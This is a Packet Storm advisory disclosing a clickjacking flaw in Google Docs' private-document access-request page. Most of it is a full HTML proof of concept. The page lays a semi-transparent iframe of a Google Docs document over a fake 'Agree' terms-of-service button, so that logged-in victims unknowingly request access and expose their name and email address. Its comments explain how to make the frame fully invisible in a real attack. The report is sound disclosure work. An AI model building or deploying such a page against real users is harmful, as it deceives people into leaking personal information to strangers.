Google Docs Information Disclosure

2013-08-28T00:00:00
ID PACKETSTORM:122984
Type packetstorm
Reporter Jacob Morgan
Modified 2013-08-28T00:00:00

Description

                                        
                                            `I reported this problem to Google in June but I did not get the usual reply  
saying they were working on it, so I guess it isn't serious enough to be  
fixed.  
  
The problem is the page for requesting access to a private document. It  
does not have any protection against being framed, so you can make a  
private document, trick someone into clicking the button to request access  
and get an email from Google Docs with their full name and email address.  
  
PoC: http://buildism.net/files/GoogleDocsClickjacking2.html  
  
<html>  
<head>  
<style type="text/css">  
body {  
margin: 0;  
padding: 0;  
}  
iframe {  
height: 426px;  
width: 910px;  
position: absolute;  
left: 0;  
bottom: 0;  
z-index: 2; /* place the iframe on top of the button, so mouse clicks will go to it */  
opacity: 0.5; /* this would be 0.0 in an actual exploit */  
filter: alpha(opacity=0.5);  
}  
#bottom_bar {  
width: 100%;  
height: 100px;  
position: absolute;  
bottom: 0;  
background-color: #ddd;  
z-index: 1;  
}  
#button {  
width: 100px;  
height: 25px;  
background-color: green;  
color: white;  
border: 1px solid black;  
text-align: center;  
line-height: 25px;  
position: absolute;  
left: 130px;  
top: 65px;  
}  
#text {  
width: 400px;  
height: 50px;  
position: absolute;  
left: 130px;  
top: 20px;  
}  
</style>  
</head>  
<body>  
<p>This only works if you are logged in to Google. In an actual exploit, the Google Docs frame would be completely transparent. Do not click the button unless you like sending your personal information to strangers on the internet.</p>  
<iframe src="https://docs.google.com/document/d/155uZlvg-uzF-Cti1QKrM7aSHGcObupWfRpC7lwre-as/edit"></iframe>  
<div id="bottom_bar">  
<div id="text">  
You must agree to our <a href="#">terms of service</a> to use our website.  
</div>  
<div id="button">  
Agree  
</div>  
</div>  
</body>  
</html>  
  
`